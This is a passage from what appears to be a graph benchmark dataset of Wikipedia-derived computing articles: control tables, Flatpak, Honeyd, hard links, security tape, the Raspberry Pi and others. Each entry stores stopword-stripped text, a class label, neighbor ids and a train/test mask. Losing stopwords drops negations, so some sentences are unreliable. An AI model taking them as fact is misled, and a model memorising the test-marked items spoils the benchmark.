ascii ebcdic character value range hexadecimal '00 'ff actual range guaranteed smaller array truncated less 256 bytes table translate raw ascii values new subroutine index 1,4,3,2 constant time using one-dimensional array automata-based programming pseudoconversational transaction processing number distinct program states small dense sequence control variable used efficiently dictate entire flow main program loop two byte raw data value would require minimum table size 65,536 bytes handle input possibilities whilst allowing 256 different output values however direct translation technique provides extremely fast validation conversion relative subroutine pointer heuristics together sufficient fast access memory permits use branch table one-dimensional 'array contiguous machine code branch/jump instructions effect multiway branch program label branched immediately preceding indexed branch sometimes generated optimizing compiler execute switch statement provided input range small dense gaps created previous array example although quite compact compared multiple equivalent codice_1 statements branch instructions still carry redundancy since branch opcode condition code mask repeated alongside branch offsets control tables containing offsets program labels constructed overcome redundancy least assembly languages yet requiring minor execution time overhead compared conventional branch table usually control table thought truth table executable binary implementation printed decision table tree decision tables several levels contain often implied propositions together one associated 'actions actions usually performed generic custom-built subroutines called interpreter program interpreter instance effectively functions virtual machine 'executes control table entries thus provides higher level abstraction underlying code interpreter control table constructed along similar lines language dependent switch statement added possibility testing combinations input values using boolean style and/or conditions potentially calling multiple subroutines instead single set values 'branch program labels switch statement construct case may available confusingly differing implementations high level languages hll control table concept comparison intrinsic language dependencies might nevertheless implemented differently according available data definition features chosen programming language control table essentially embodies 'essence conventional program stripped programming language syntax platform dependent components e.g if/then do.. for.. while.. switch goto call 'condensed variables e.g input1 values e.g 'm 'd subroutine identities e.g 'add 'subtract.. 1 2.. structure table typically implies default logical operations involved 'testing equality performing subroutine 'next operation following default sequence rather explicitly stated within program statements required programming paradigms multi-dimensional control table normally minimum contain value/action pairs may additionally contain operators type information location size format input output data whether data conversion run-time processing nuances required processing already implicit function table may may contain indexes relative absolute pointers generic customized primitives subroutines executed depending upon values row table illustrated applies 'input1 since specific input specified table conditions actions implied structure variety values encoded within control table largely dependent upon computer language used assembly language provides widest scope data types including actions option directly executable machine code typically control table contain values possible matching class input together corresponding pointer action subroutine languages claim support pointers directly nevertheless instead support index used represent 'relative subroutine number perform conditional execution controlled value table entry e.g use optimized switch statement designed zero gaps i.e multiway branch comments positioned column even embedded textual documentation render decision table 'human readable even 'condensing encoding essentials still broadly in-line original program specification especially printed decision table enumerating unique action created coding begins table entries also optionally contain counters collect run-time statistics 'in-flight later optimization control tables reside static storage auxiliary storage flat file database may alternatively partially entirely built dynamically program initialization time parameters may reside table optimum efficiency table memory resident interpreter begins use interpreter written suitable programming language including high level language suitably designed generic interpreter together well chosen set generic subroutines able process commonly occurring primitives would require additional conventional coding new custom subroutines addition specifying control table interpreter optionally may apply well-defined sections complete application program main control loop 'less conditional sections program initialization termination interpreter need unduly complex produced programmer advanced knowledge compiler writer written application program except usually designed efficiency mind primary function execute table entries set instructions need requirement parsing control table entries therefore designed far possible 'execution ready requiring plugging variables appropriate columns already compiled generic code interpreter program instructions theory infinitely extensible constitute possibly arbitrary values within table meaningful interpreter control flow interpreter normally sequential processing table row may modified specific actions table entries arbitrary values thus designed efficiency mind selecting values used direct indexes data function pointers particular platforms/language specifically designed minimize instruction path lengths using branch table values even cases jit compilers consist directly executable machine code snippets pointers subroutines may coded either language interpreter supported program language provided suitable inter-language 'call linkage mechanisms exist choice language interpreter and/or subroutines usually depend upon portable needs across various platforms may several versions interpreter enhance portability control table subordinate control table pointer may optionally substitute subroutine pointer 'action column interpreter supports construct representing conditional 'drop lower logical level mimicking conventional structured program structure first sight use control tables would appear add quite lot program overhead requiring interpreter process 'native programming language statements executed however always case separating 'encapsulating executable coding logic expressed table readily targeted perform function efficiently may experienced obviously spreadsheet application underlying spreadsheet software transparently converts complex logical 'formulae efficient manner able order display results examples chosen partly illustrate potential performance gains may compensate significantly additional tier abstraction also improve upon otherwise might less efficient less maintainable lengthier code although examples given 'low level assembly language c language seen cases lines code required implement control table approach yet achieve significant constant time performance improvements reduce repetitive source coding aid clarity compared verbose conventional program language constructs see also quotations donald knuth concerning tables efficiency multiway branching article following examples arbitrary based upon single input simplicity however intention merely demonstrate control flow effected via use tables instead regular program statements clear technique easily extended deal multiple inputs either increasing number columns utilizing multiple table entries optional and/or operator similarly using hierarchical 'linked control tables structured programming accomplished optionally using indentation help highlight subordinate control tables ct1 example control table simple lookup table first column represents input value tested implied 'if input1 x true corresponding 2nd column 'action contains subroutine address perform call jump similar switch statement effect multiway branch return form dynamic dispatch last entry default case match found ct1 programming languages support pointers within data structures alongside data values table ct1 used direct control flow appropriate subroutines according matching value table without column indicate otherwise equality assumed simple case assembly language example ibm/360 maximum 16mb address range z/architecture attempt made optimize lookup coding first example uses instead simple linear search technique purely illustrate concept demonstrate fewer source lines handle 256 different input values approximately 265 lines source code would required mainly single line table entries whereas multiple 'compare branch would normally required around 512 source lines size binary also approximately halved table entry requiring 4 bytes instead approximately 8 bytes series 'compare immediate'/branch instructions larger input variables saving even greater improving performance interpreter example improved interpreter 26 times less executed instructions example average n= 1 64 13 times less would needed using multiple comparisons handle 64 different input values approximately 85 lines source code less required mainly single line table entries whereas multiple 'compare branch would require around 128 lines size binary also almost halved despite additional 256 byte table required extract 2nd index improved interpreter 21 times less executed instructions n =64 first example average 42 times less would needed using multiple comparisons handle 256 different input values approximately 280 lines source code less would required mainly single line table entries whereas multiple 'compare branch would require around 512 lines size binary also almost halved c language example example c uses two tables first ct1 simple linear search one-dimensional lookup table obtain index matching input x second associated table ct1p table addresses labels jump made efficient 256 byte table used translate raw ascii value x directly dense sequential index value use directly locating branch address ct1p i.e index mapping byte-wide array execute constant time possible values x ct1p contained names functions instead labels jump could replaced dynamic function call eliminating switch-like goto decreasing performance additional cost function housekeeping next example illustrates similar effect achieved languages support pointer definitions data structures support indexed branching subroutine contained within 0-based array subroutine pointers table ct2 used extract index 2nd column pointer array ct2p pointer arrays supported switch statement equivalent used alter control flow one sequence program labels e.g case0 case1 case2 case3 case4 either process input directly else perform call return appropriate subroutine default add subtract multiply divide.. deal ct2 examples possible efficiently translate potential ascii input values unknown pointer array index without actually using table lookup shown table consistency first example multi-dimensional control tables constructed i.e customized 'more complex examples might test multiple conditions multiple inputs perform one 'action based matching criteria 'action include pointer another subordinate control table simple example implicit 'or condition incorporated extra column handle lower case input however instance could equally handled simply extra entry lower case characters specifying subroutine identifier upper case characters extra column count actual run-time events input occur also included ct3 control table entries much similar conditional statements procedural languages crucially without actual language dependent conditional statements i.e instructions present generic code physically interpreter processes table entries table simply embodies program logic via structure values tables series similar table entries defines entire logic table entry number pointer may effectively take place program counter conventional programs may reset 'action also specified table entry example ct4 shows extending earlier table include 'next entry and/or including 'alter flow jump subroutine create loop example actually efficient way construct control table demonstrating gradual 'evolution first examples shows additional columns used modify behaviour fifth column demonstrates one action initiated single table entry case action performed normal processing entry '- values mean 'no conditions 'no action structured programming goto-less code incorporating equivalent 'do 'for loop constructs also accommodated suitably designed 'indented control table structures ct4 complete 'program read input1 process repeating e encountered specialist field telecommunications rating concerned determining cost particular call table-driven rating techniques illustrate use control tables applications rules may change frequently market forces tables determine charges may changed short notice non-programmers many cases algorithms pre-built interpreter therefore require additional runtime interpretation expression held table known rule-based rating rather table-driven rating consequently consumes significantly overhead spreadsheet data sheet thought two dimensional control table non empty cells representing data underlying spreadsheet program interpreter cells containing formula usually prefixed equals sign simply designate special type data input dictates processing referenced cells altering control flow within interpreter externalization formulae underlying interpreter clearly identifies spreadsheets cited rule based rating example readily identifiable instances use control tables non programmers control tables technique could said belong particular programming paradigm closest analogy might automata-based programming reflective form metaprogramming since table entries could said 'modify behaviour interpreter interpreter however subroutines programmed using one available paradigms even mixture table essentially collection raw data values even need compiled could read external source except specific platform dependent implementations using memory pointers directly greater efficiency multi-dimensional control table conceptual similarities bytecode operating virtual machine platform dependent interpreter program usually required perform actual execution largely conditionally determined tables content also conceptual similarities recent common intermediate language cil aim creating common intermediate 'instruction set independent platform unlike cil pretensions used common resource languages p-code also considered similar earlier implementation origins far back 1966 multi-dimensional control table used determine program flow normal hardware program counter function effectively simulated either pointer first next table entry else index fetching instruction involves decoding data table entry without necessarily copying data within entry first programming languages able use pointers dual advantage less overhead involved accessing contents also advancing counter point next table entry execution calculating next 'instruction address i.e table entry even performed optional additional action every individual table entry allowing loops jump instructions stage interpreter program optionally save program counter relevant details depending upon instruction type stage record full partial trace actual program flow debugging purposes hot spot detection code coverage analysis performance analysis see examples ct3 ct4 optionally following mainly apply use multi-dimensional tables one-dimensional tables discussed earlier",
    "neighbors": [
      9345,
      522,
      9739,
      11674,
      8609,
      2339,
      8868,
      7461,
      5415,
      10796,
      1841,
      7607,
      2619,
      2620,
      4042,
      7627,
      9932,
      2901,
      7421,
      477,
      9315,
      5354,
      2798,
      1776,
      9330,
      3443,
      372,
      9714,
      2811,
      3708,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1842,
    "label": 2,
    "text": "Flatpak:flatpak flatpak formerly xdg-app software utility software deployment package management linux advertised offering sandbox environment users run application software isolation rest system applications using flatpak need permissions access bluetooth sound pulseaudio network files etc. permissions defined maintainer flatpak controlled added removed users system flatpak developed part freedesktop.org project formerly known x desktop group xdg originally called xdg-app flathub repository remote source flatpak terminology located become de facto standard getting applications packaged flatpak packages added flathub administrators developers programs though admins stated preference developer-submitted apps although flathub de facto source applications packaged flatpak flatpak work independently flathub possible host remote access remotes totally independent flathub",
    "neighbors": [
      2432,
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7309,
      7947,
      2448,
      9487,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      4902,
      4775,
      5670,
      6694,
      7847,
      6828,
      8621,
      6446,
      7983,
      823,
      2872,
      6583,
      11322,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      7293,
      4951,
      3033,
      2010,
      6361,
      9564,
      2401,
      10977,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      9063,
      4972,
      7020,
      8685,
      9324,
      7920,
      6257,
      1138,
      1522,
      2804,
      10096,
      8438,
      6393,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1843,
    "label": 4,
    "text": "Honeyd:honeyd honeyd open source computer program created niels provos allows user set run multiple virtual hosts computer network virtual hosts configured mimic several different types servers allowing user simulate infinite number computer network configurations honeyd primarily used field computer security honeyd used primarily two purposes using software ability mimic many different network hosts 65536 hosts honeyd act distraction potential hackers network 3 real servers one server running honeyd network appear running hundreds servers hacker hacker research possibly social engineering order determine servers real hacker may get caught honeypot either way hacker slowed possibly caught honeyd gets name ability used honeypot network normal traffic valid servers thus network administrator running honeyd monitor his/her logs see traffic going virtual hosts set honeyd traffic going virtual servers considered highly suspicious network administrator take preventative action perhaps blocking suspicious ip address monitoring network suspicious traffic",
    "neighbors": [
      9256,
      1785,
      4956,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1844,
    "label": 6,
    "text": "Hard_link:hard link computing hard link directory entry associates name file file system directory-based file systems must least one hard link giving original name file term “ hard link ” usually used file systems allow one hard link file creating additional hard link effect giving one file multiple names e.g different names different directories independently connect data disk none depends others causes alias effect e.g file opened one names changes made content changes also visible file opened alternative name contrast soft link “ shortcut ” file direct link data rather short file contains text file name location gives direct access yet another file name within directory name contained referred soft link may either hard link another soft link also creates aliasing different way every directory file special contains list file names maintained file system since directories files multiple hard links directories possible could create loops within structure directories rather branching structure like tree reason creation hard links directories sometimes forbidden multiple hard links – multiple directory entries file – supported posix-compliant partially posix-compliant operating systems linux android macos also windows nt4 later windows nt operating systems support also depends type file system used instance ntfs file system supports multiple hard links fat refs posix-compliant partially posix-compliant operating systems unix-like systems additional hard links existing files created system call ln link command-line utilities codice_1 command reveal many hard links point given file link count also included output codice_2 microsoft windows hard links created using codice_3 command windows nt 6.0 later systems windows vista earlier systems windows xp windows server 2003 using codice_4 windows api windows 2000 onwards includes createhardlink call create hard links deletefile used remove getfileinformationbyhandle used determine number hard links associated file hard links require ntfs partition starting windows vista hard links used windows component store winsxs keep track different versions dlls stored hard disk drive unix-like emulation compatibility software running windows cygwin subsystem unix-based applications allow use posix interfaces windows process unlinking dissociates name data volume without destroying associated data data still accessible long least one link points still exists last link removed space considered free process called undeleting allows recreation links data longer associated name however process available systems often reliable file deleted added free space map re-use portion deleted file space claimed new data undeletion unsuccessful previous data overwritten may result cross-linking new data leading filesystem corruption additionally deleted files solid state drives may erased time storage device reclamation free space file systems support hard links use reference counting integer value stored physical data section integer represents total number hard links created point data new link created value increased one link removed value decreased one link count becomes zero operating system usually automatically deallocates data space file process file opened access may choose immediately either performance enable undelete command maintenance value guarantees dangling hard links pointing nowhere happen symbolic links filesystem file associated inode preserved long single hard link directory reference points process keeps associated file open relieving burden accounting programmer user simple method file system track use given area storage zero values indicate free space nonzero values indicate used space posix-compliant operating systems many unix-variants reference count file directory returned stat fstat system calls codice_5 field codice_6 figure right two hard links named link a.txt link b.txt point physical data file link a.txt opened editor modified saved changes visible file link b.txt opened viewing since filenames point data opened posix systems associated file descriptor remains valid opening even original file moved true file opened link b.txt — name associated data editors however break hard link concept e.g emacs opening file link b.txt editing emacs first renames link b.txt link b.txt~ loads link b.txt~ editor saves modified contents newly created link b.txt using approach two hard links link a.txt link b.txt~ backup file link b.txt would one link longer shares data link a.txt behavior changed using emacs variable codice_7 number hard links physical data may created access data user needs specify name existing link operating system resolve location actual data one links removed posix unlink function example unix codice_8 command data still accessible link remains links removed process file open space occupied data freed allowing reused future semantic allows deleting open files without affecting process uses technique commonly used ensure temporary files deleted automatically program termination including case abnormal termination prevent loops filesystem keep interpretation parent directory consistent many modern operating systems allow hard links directories unix system v allowed superuser permission make links mac os x v10.5 leopard newer use hard links directories time machine backup mechanism symbolic links ntfs junction points generally used instead purpose hard links created files volume link file different volume needed may created symbolic link maximum number hard links single file limited size reference counter unix-like systems counter usually machine-word-sized 32- 64-bit 4,294,967,295 18,446,744,073,709,551,615 links respectively though filesystems number hard links limited strictly on-disk format linux 3.11 ext4 filesystem limits number hard links file 65,000 windows ntfs filesystem limit 1024 hard links file hard links criticized high-maintenance design neil brown linux weekly news since complicate design programs handle directory trees including archivers disk usage tools du must take care de-duplicate files linked multiple times hierarchy brown also calls attention fact plan 9 bell labs intended successor unix include concept hard link",
    "neighbors": [
      5120,
      2051,
      516,
      11270,
      5643,
      6669,
      3598,
      4624,
      10257,
      9747,
      6677,
      5142,
      8214,
      10774,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      5158,
      1577,
      10281,
      8236,
      52,
      2101,
      11323,
      10812,
      576,
      3648,
      8772,
      10310,
      1098,
      7754,
      7244,
      4173,
      4174,
      10314,
      9808,
      10828,
      4178,
      10839,
      603,
      9819,
      3170,
      4708,
      5225,
      8298,
      9836,
      7789,
      622,
      9839,
      9840,
      4210,
      7796,
      9333,
      6263,
      1656,
      6265,
      5754,
      4731,
      7290,
      9335,
      639,
      9343,
      10879,
      6280,
      8841,
      7818,
      6797,
      654,
      4238,
      2193,
      2194,
      9874,
      10900,
      2197,
      2199,
      4248,
      11419,
      6813,
      7838,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      1193,
      6820,
      10405,
      2221,
      5293,
      7344,
      3250,
      11442,
      5300,
      2230,
      7351,
      5816,
      700,
      1212,
      2749,
      8380,
      10428,
      5313,
      2244,
      8391,
      200,
      10951,
      9420,
      3794,
      3795,
      4819,
      8402,
      6358,
      8404,
      728,
      8410,
      6365,
      2782,
      9442,
      7907,
      4836,
      4326,
      2279,
      6377,
      1770,
      8938,
      3308,
      1263,
      3312,
      10993,
      3826,
      2291,
      246,
      3834,
      1791,
      3328,
      11519,
      3330,
      11012,
      2314,
      8461,
      3856,
      6416,
      8976,
      9490,
      5397,
      3351,
      5911,
      6935,
      8473,
      11033,
      8988,
      11546,
      287,
      1825,
      6434,
      9505,
      5413,
      3366,
      3368,
      3881,
      5928,
      10024,
      9004,
      10026,
      302,
      7983,
      10029,
      6961,
      1332,
      9525,
      823,
      10039,
      6972,
      9533,
      3394,
      3909,
      2378,
      4431,
      5969,
      3922,
      4439,
      5975,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2919,
      4458,
      9066,
      5492,
      7540,
      10101,
      6519,
      376,
      9593,
      890,
      11128,
      2943,
      2432,
      7554,
      3975,
      1418,
      5003,
      5004,
      5514,
      8075,
      8080,
      4506,
      11675,
      11677,
      414,
      2974,
      7070,
      929,
      11683,
      4012,
      430,
      1454,
      6062,
      10673,
      8114,
      2995,
      7603,
      8631,
      1464,
      6584,
      1978,
      9655,
      956,
      960,
      3522,
      8643,
      8132,
      6088,
      969,
      3535,
      8659,
      7126,
      1498,
      5594,
      478,
      6625,
      6114,
      6115,
      1509,
      9189,
      6637,
      6126,
      7663,
      9709,
      6641,
      3571,
      9204,
      3573,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1845,
    "label": 4,
    "text": "Security_tape:security tape security tape security label type adhesive tape used help reduce shipping losses due pilfering reduce tampering product adulteration often pressure sensitive tape label special tamper resistant tamper evident features used ‘ ’ security seal ’ ’ addition container closure used security label sometimes used authentication products anti-pilferage seal security tapes labels sometimes used conjunction security envelopes security tapes used packaging tapes small primary packages bottles cartons larger shipping containers corrugated boxes also used unit loads palletized goods strength adhesive bonding important security labels usually used security features backing strength less important bonding characteristics critical security tapes appearance similar standard packaging tapes help conceal value pilferable item logistics packaging professionals want bring attention item package security tapes bright colors high impact graphics security tapes labels one part broader security system one layer security provide full protection shipments packages security products foiled knowledgeable person sufficient time access specialized tools solvents extreme temperatures security tapes labels adhesives etc security tapes labels usually add security one point entry container points unauthorized entry sometimes available security tapes also used access doors temporary area denial tamper indicating seals sensitive equipment uses security tapes require stability sun heat many types constructions tapes labels used security use security printing holography embossing barcodes rfid chips etc common tape strips labels sequential serial numbers bar codes etc custom printing corporate logo etc useful needs revised periodically creative counterfeiters many security tapes extra strong backings high performance adhesives damaged partially open package invitation theft tampering high graphics draw attention package shipment security tapes often special features indicate opening including security tapes usually wound roll storage dispensing either release liner used premium release coating used top surface security labels typically employ release liner die-cut sometimes tape label intended provide signal removal container tampering imaging delamination fracture etc desired outcome tape label correctly indicate attempted unauthorized container opening conversely signal tampering tampering type binary classification may possible “ false negative ” label appears intact yet tampering occurred depending specific security tape/label may specialized means removing reattaching label covering obscuring signaled/activated label etc also tampering could occurred different part container “ false positive ” may also possible either accident intent",
    "neighbors": [
      5433,
      10163,
      6141
    ],
    "mask": "None"
  },
  {
    "node_id": 1846,
    "label": 3,
    "text": "ICLOAK:icloak icloak linux-based operating system designed security primary objective boots live usb device replaces main os default leaves trace user computer unless files explicitly saved persistent partition internet traffic routed tor icloak comes various utilities word-processor abiword spreadsheet application gnumeric originally icloak funded successful kickstarter campaign raised 100,000",
    "neighbors": [
      7483,
      5363,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1847,
    "label": 4,
    "text": "Time/memory/data_tradeoff_attack:time/memory/data tradeoff attack time/memory/data tradeoff attack type cryptographic attack attacker tries achieve situation similar space–time tradeoff one parameter data amount data available attacker real time attacker balances reduces one two parameters favor one two type attack hard ciphers encryption schemes designed resist type attack attack special type general cryptanalytic time/memory tradeoff attack tradeoff attacks symmetric cryptosystems dates back 1980 hellman suggested time/memory tradeoff method break block ciphers formula_1 possible keys time formula_2 memory formula_3 related tradeoff curve formula_4 formula_5 later babbage golic devised different tradeoff attack stream ciphers new bound formula_6 formula_7 formula_8 output data available cryptanalyst real time attack special type general cryptanalytic time/memory tradeoff attack general time/memory tradeoff attack two main phases time/memory/data tradeoff attack following parameters block ciphers formula_1 total number possible keys also assume number possible plaintexts ciphertexts formula_1 also let given data single ciphertext block specific plaintext counterpart consider mapping key formula_16 ciphertext formula_17 random permutation function formula_18 formula_1 point space function formula_18 invertible need find inverse function formula_21 hellman technique invert function according hellman block cipher hand property mapping key cipher text random permutation function formula_18 formula_1 point space formula_18 invertible tradeoff relationship becomes ways better formula_6 stream ciphers formula_1 specified number internal states bit generator probably different number keys formula_8 count first pseudorandom bits produced generator finally attacker goal find one actual internal states bit generator able run generator point generate rest key associate possible formula_1 internal states bit generator corresponding string consists first formula_66 bits obtained running generator state mapping formula_67 states formula_16 output prefixes formula_17 previous mapping considered random function formula_1 points common space invert function attacker establishes following result birthday attack gives condition formula_85 attack time formula_86 preprocessing time formula_87 particular point tradeoff curve formula_6 generalize relation ignore available data real time able reduce formula_2 formula_86 formula_91 general tradeoff curve eventually becomes formula_6 formula_7 formula_87 novel idea introduced 2000 combines hellman tradeoff babbage-and-golic tradeoff attacks achieve new tradeoff curve better bounds stream ciphers cryptoanalysis hellman block cipher technique applied stream cipher using idea covering formula_1 points space matrices obtained multiple variants formula_54 function formula_18 mapping internal states output prefixes recall tradeoff attack stream cipher successful given formula_8 output prefixes found matrices covering formula_1 cuts number covered points matrices formula_1 formula_101 points done reducing number matrices formula_27 formula_103 keeping formula_25 large possible requires formula_105 least one table new attack formula_106 reduced number matrices formula_103 preprocessing time formula_108 realtime required attack formula_109 product number matrices length iteration number available data points attack time eventually use matrix stopping rule obtain tradeoff curve formula_110 formula_111 formula_112 attack invented biryukov shamir wagner idea relies following feature various stream ciphers bit generator undergoes changes internal state producing next output bit therefore enumerate special states generate formula_113 zero bits small values formula_113 low cost forcing large number output bits take specific values enumeration process become expensive difficult define sampling resistance stream cipher formula_115 formula_113 maximum value makes enumeration feasible let stream cipher formula_117 states full name formula_118 bits corresponding output name first formula_118 bits output sequence bits stream cipher sampling resistance formula_115 efficient enumeration use short name formula_121 bits define special states generator special state formula_121 short name corresponding short output name formula_121 bits output sequence special state removing first formula_113 leading bits able define new mapping reduced space formula_125 points mapping equivalent original mapping let formula_126 realtime data available attacker guaranteed least one output special states otherwise relax definition special states include points substitute formula_8 formula_128 formula_1 formula_130 new time/memory/data tradeoff attack shamir biryukov obtain tradeoff curve formula_131 formula_132 actually improvement since could relax lower bound formula_2 since formula_134 small formula_91 means attack made faster technique reduces number expensive disk access operations formula_27 formula_137 since accessing special formula_128 points makes attack faster reduced number expensive disk operations",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      10662,
      169,
      11185,
      2357,
      10806,
      9528,
      9541,
      10315,
      6863,
      8273,
      10963,
      212,
      9556,
      2265,
      1114,
      7643,
      9697,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 1848,
    "label": 3,
    "text": "Load_task_register:load task register ltr x86 instruction stands load task register used operating systems support multitasking ltr supported protected mode long mode real mode virtual 8086 mode must executed cpl 0 therefore used application programs ltr loads special x86 task register segment selector points task state segment executing ltr instruction tss pointed argument marked busy hardware task switch occurs opposite ltr instruction str instruction copies value task register specified location note x86 task register accessible directly ltr str instructions",
    "neighbors": [
      255,
      2345,
      6730,
      2987,
      499,
      5080,
      1247
    ],
    "mask": "None"
  },
  {
    "node_id": 1849,
    "label": 3,
    "text": "Raspberry_Pi:raspberry pi raspberry pi series small single-board computers developed united kingdom raspberry pi foundation promote teaching basic computer science schools developing countries original model became far popular anticipated selling outside target market uses robotics include peripherals keyboards mice cases however accessories included several official unofficial bundles organisation behind raspberry pi consists two arms first two models developed raspberry pi foundation pi model b released foundation set raspberry pi trading eben upton ceo develop third model b+ raspberry pi trading responsible developing technology foundation educational charity promote teaching basic computer science schools developing countries according raspberry pi foundation 5 million raspberry pis sold february 2015 making best-selling british computer november 2016 sold 11 million units 12.5m march 2017 making third best-selling general purpose computer july 2017 sales reached nearly 15 million march 2018 sales reached 19 million pis made sony factory pencoed wales made china japan several generations raspberry pis released models feature broadcom system chip soc integrated arm-compatible central processing unit cpu on-chip graphics processing unit gpu processor speed ranges 700 mhz 1.4 ghz pi 3 model b+ 1.5ghz pi 4 on-board memory ranges 256 mb 1 gb 4 gb available pi 4 random-access memory ram secure digital sd cards microsdhc form factor sdhc early models used store operating system program memory boards one four usb ports video output hdmi composite video supported standard 3.5 mm tip-ring-sleeve jack audio output lower-level output provided number gpio pins support common protocols like i²c b-models 8p8c ethernet port pi 3 pi zero w on-board wi-fi 802.11n bluetooth prices range us 5 55 first generation raspberry pi 1 model b released february 2012 followed simpler cheaper model 2014 foundation released board improved design raspberry pi 1 model b+ boards approximately credit-card sized represent standard mainline form-factor improved a+ b+ models released year later compute module released april 2014 embedded applications raspberry pi 2 added ram released february 2015 raspberry pi zero smaller size reduced input/output i/o general-purpose input/output gpio capabilities released november 2015 us 5 2017 became newest mainline raspberry pi 28 february 2017 raspberry pi zero w launched version zero wi-fi bluetooth capabilities us 10 12 january 2018 raspberry pi zero wh launched version zero w pre-soldered gpio headers raspberry pi 3 model b released february 2016 1.2 ghz 64-bit quad core processor on-board 802.11n wi-fi bluetooth usb boot capabilities pi day 2018 raspberry pi 3 model b+ launched faster 1.4 ghz processor three-times faster gigabit ethernet throughput limited ca 300 mbit/s internal usb 2.0 connection 2.4 5 ghz dual-band 802.11ac wi-fi 100 mbit/s features power ethernet poe usb boot network boot sd card longer required raspberry pi 4 model b released june 2019 1.5 ghz 64-bit quad core arm cortex-a72 processor on-board 802.11ac wi-fi bluetooth 5 full gigabit ethernet throughput limited two usb 2.0 ports two usb 3.0 ports dual monitor support 4k resolution pi 4 also powered via usb-c port enabling additional power provided downstream peripherals used appropriate psu three sizes onboard ram available 1 gb us 35 2 gb us 45 4 gb us 55 raspberry pi 4 design flaw third-party e-marked usb cables used apple macbooks incorrectly identify refuse provide power expected corrected future board revision tom hardware tested 14 different cables found 11 turned powered pi without issue raspberry pi hardware evolved several versions feature variations memory capacity peripheral-device support block diagram describes model b b+ model a+ pi zero similar lack ethernet usb hub components ethernet adapter internally connected additional usb port model a+ pi zero usb port connected directly system chip soc pi 1 model b+ later models usb/ethernet chip contains five-port usb hub four ports available pi 1 model b provides two pi zero usb port also connected directly soc uses micro usb otg port unlike pi models 40 pin gpio connector omitted pi zero solderable holes pin locations pi zero wh remedies broadcom bcm2835 soc used first generation raspberry pi includes 700 mhz arm1176jzf-s processor videocore iv graphics processing unit gpu ram level 1 l1 cache 16 kb level 2 l2 cache 128 kb level 2 cache used primarily gpu soc stacked underneath ram chip edge visible arm1176jz f -s cpu used original iphone although higher clock rate mated much faster gpu earlier v1.1 model raspberry pi 2 used broadcom bcm2836 soc 900 mhz 32-bit quad-core arm cortex-a7 processor 256 kb shared l2 cache raspberry pi 2 v1.2 upgraded broadcom bcm2837 soc 1.2 ghz 64-bit quad-core arm cortex-a53 processor soc used raspberry pi 3 underclocked default 900 mhz cpu clock speed v1.1 bcm2836 soc longer production late 2016 raspberry pi 3+ uses broadcom bcm2837b0 soc 1.4 ghz 64-bit quad-core arm cortex-a53 processor 512 kb shared l2 cache raspberry pi 4 uses broadcom bcm2711 soc 1.5 ghz 64-bit quad-core arm cortex-a72 processor raspberry pi zero zero w use broadcom bcm2835 soc first generation raspberry pi although running 1 ghz cpu clock speed operating 700 mhz default first generation raspberry pi provided real-world performance roughly equivalent 0.041 gflops cpu level performance similar 300 mhz pentium ii 1997–99 gpu provides 1 gpixel/s 1.5 gtexel/s graphics processing 24 gflops general purpose computing performance graphical capabilities raspberry pi roughly equivalent performance xbox 2001 raspberry pi 2 v1.1 included quad-core cortex-a7 cpu running 900 mhz 1 gb ram described 4–6 times powerful predecessor gpu identical original parallelised benchmarks raspberry pi 2 v1.1 could 14 times faster raspberry pi 1 model b+ raspberry pi 3 quad-core arm cortex-a53 processor described ten times performance raspberry pi 1 benchmarks showed raspberry pi 3 approximately 80 faster raspberry pi 2 parallelised tasks raspberry pi systems-on-chip could overclocked 800 mhz 1000 mhz reports raspberry pi 2 similarly overclocked extreme cases even 1500 mhz discarding safety features over-voltage limitations raspbian linux distro overclocking options boot done software command running sudo raspi-config without voiding warranty cases pi automatically shuts overclocking chip temperature reaches possible override automatic over-voltage overclocking settings voiding warranty appropriately sized heat sink needed protect chip serious overheating newer versions firmware contain option choose five overclock turbo presets used attempt maximise performance soc without impairing lifetime board done monitoring core temperature chip cpu load dynamically adjusting clock speeds core voltage demand low cpu running hot performance throttled cpu much chip temperature acceptable performance temporarily increased clock speeds 1 ghz depending board version turbo settings used seven overclock presets highest turbo preset sdram clock originally 500 mhz later changed 600 mhz 500 mhz sometimes causes sd card corruption simultaneously high mode core clock speed lowered 450 250 mhz medium mode 333 250 mhz cpu first second generation raspberry pi board require cooling heat sink fan even overclocked raspberry pi 3 may generate heat overclocked older beta model b boards 128 mb allocated default gpu leaving 128 mb cpu first 256 mb release model b model three different splits possible default split 192 mb ram cpu sufficient standalone 1080p video decoding simple 3d probably together 224 mb linux 1080p framebuffer likely fail video 3d 128 mb heavy 3d possibly also video decoding e.g kodi comparatively nokia 701 uses 128 mb broadcom videocore iv later model b 512 mb ram new standard memory split files arm256_start.elf arm384_start.elf arm496_start.elf initially released 256 mb 384 mb 496 mb cpu ram 256 mb 128 mb 16 mb video ram respectively week later rpf released new version start.elf could read new entry config.txt gpu_mem= xx could dynamically assign amount ram 16 256 mb 8 mb steps gpu older method memory splits became obsolete single start.elf worked 256 mb 512 mb raspberry pis raspberry pi 2 raspberry pi 3 1 gb ram raspberry pi zero zero w 512 mb ram raspberry pi 4 choice 1 2 4 gb ram set time manufacture raspberry pi 4 model b safety user guide mentions raspberry pi 4 model b 1 gb 2 gb 4 gb 8 gb variants 8gb model available 2019 launch model a+ pi zero ethernet circuitry commonly connected network using external user-supplied usb ethernet wi-fi adapter ethernet port provided built-in usb ethernet adapter using smsc lan9514 chip raspberry pi 3 pi zero w wireless equipped 2.4 ghz wifi 802.11n bluetooth 4.1 based broadcom bcm43438 fullmac chip official support monitor mode implemented unofficial firmware patching pi 3 also 10/100 mbit/s ethernet port raspberry pi 3b+ features dual-band ieee 802.11b/g/n/ac wifi 